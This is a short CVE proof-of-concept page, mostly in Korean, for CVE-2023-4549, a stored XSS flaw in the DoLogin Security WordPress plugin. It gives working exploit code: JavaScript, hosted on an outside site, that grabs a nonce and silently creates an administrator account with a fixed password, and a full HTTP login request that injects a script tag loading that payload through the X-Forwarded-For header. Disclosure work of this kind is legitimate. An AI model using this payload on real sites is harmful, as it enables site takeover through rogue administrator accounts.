
CVE-2023-4549 취약점 저장소.
CVE ID: CVE-2023-4549
취약점 유형: 크로스 사이트 스크립팅(XSS)
설명: WordPress용 DoLogin Security 플러그인은 3.6 이하 버전에서 'X-Forwarded-For' 헤더를 통한 저장형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 이는 불충분한 입력 삭제(sanitization) 및 출력 이스케이핑(escaping) 때문입니다. 이로 인해 인증되지 않은 공격자가 페이지에 임의의 웹 스크립트를 주입할 수 있으며, 사용자가 주입된 페이지에 접근할 때마다 해당 스크립트가 실행됩니다.
재현 절차:
1. Put javascript payload on html.cafe.
const url = 'https://s…t/wp-admin/user-new.php';
fetch(url)
.then(response => response.text())
.then(html => {
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
const nonceValue = doc.getElementById('_wpnonce_create-user').value;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: `action=createuser&_wpnonce_create-user=${encodeURIComponent(
nonceValue
)}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&[email protected]&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=administrator&ure_other_roles=&createuser=Add+New+User`
};
return fetch(url, requestOptions);
});
2. Send HTTP login request with specially crafted X-Forwarded-For header.
POST /wp-login.php HTTP/2
Host: <host>
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Content-Length: 106
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://<host>
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<host>/wp-login.php
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-For: <script src=https://html.cafe/x...3></script>
log=XSSor&pwd=abcd&wp-submit=Log+In&redirect_to=https%3A%2F%2F<host>%2Fwp-admin%2F&testcookie=1
참조: